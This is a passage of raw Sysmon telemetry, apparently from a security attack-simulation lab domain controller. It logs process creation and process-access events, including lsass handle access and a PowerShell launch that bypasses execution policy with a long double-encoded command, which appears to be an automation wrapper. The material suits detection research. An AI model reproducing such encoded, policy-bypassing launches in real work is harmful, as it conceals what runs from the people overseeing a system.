EM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004767Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.290{D28789B6-7CD8-5FA1-F300-000000008801}656C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{D28789B6-7CD8-5FA1-F100-000000008801}884C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000004766Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004765Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.274{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7CD8-5FA1-F200-000000008801}4688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004764Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.274{D28789B6-7CD8-5FA1-F000-000000008801}37443560C:\Windows\system32\cmd.exe{D28789B6-7CD8-5FA1-F200-000000008801}4688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004763Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.289{D28789B6-7CD8-5FA1-F200-000000008801}4688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CD8-5FA1-59E7-0A0000000000}0xae7590HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CD8-5FA1-F000-000000008801}3744C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x80000000000000004762Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.274{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004761Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.274{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004760Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.274{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004759Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.274{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004758Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.274{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004757Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.274{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004756Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.274{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004755Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.274{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004754Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.274{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004753Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.274{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004752Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.274{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7CD8-5FA1-F100-000000008801}884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004751Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.274{D28789B6-7CD8-5FA1-EF00-000000008801}39643644C:\Windows\system32\conhost.exe{D28789B6-7CD8-5FA1-F000-000000008801}3744C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004750Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.274{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CD8-5FA1-F100-000000008801}884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004749Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.274{D28789B6-7CD7-5FA1-EA00-000000008801}38161744C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{D28789B6-7CD8-5FA1-F100-000000008801}884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+14738|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d8a0|C:\Program 